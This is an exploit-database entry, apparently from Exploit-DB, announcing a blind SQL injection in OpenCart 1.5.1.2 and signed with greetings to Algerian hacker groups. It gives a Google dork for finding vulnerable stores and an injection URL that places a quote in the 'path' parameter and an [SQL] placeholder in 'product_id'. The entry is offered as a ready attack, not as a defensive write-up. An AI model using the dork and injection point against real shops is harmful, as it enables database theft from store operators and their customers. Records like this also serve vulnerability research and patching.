OpenCart 1.5.1.2 - Blind SQL Injection

EDB-ID:

17807

CVE:



Platform:

PHP

Published:

2011-09-08

====================================================
OpenCart v1.5.1.2 <= Blind SQL Vulnerability
====================================================


# Exploit Title: OpenCart v1.5.1.2 / Blind SQL Vulnerability
# Date: 08 - 09 - 2011
# Author: Rires Walid
# Software Link: http://www.opencart.com
# Contact : http://dz4web.info
# Version: v1.5.1.2
# Google dork: Powered By OpenCart Your Store © 2011
# Tested on: Xp Sp2(fr)

[*] ## ExPLo!T: 



http://localhost/index.php?route=product/product&path=%27&product_id=[SQL]





=================================**Algerians Hackers**====================================|
# Greets To :                                                                             |
  **All Algerians Hackers** , Lagripe-Dz , HACKeR Dz ,  Sec4ever ,MMA_LORD_735,Jago_dz    |
  i-hmx , 3H34N , (1337day.com) , FoX HaCkEr , Serir W4Lid , Dz4Web.info                  |
==========================================================================================|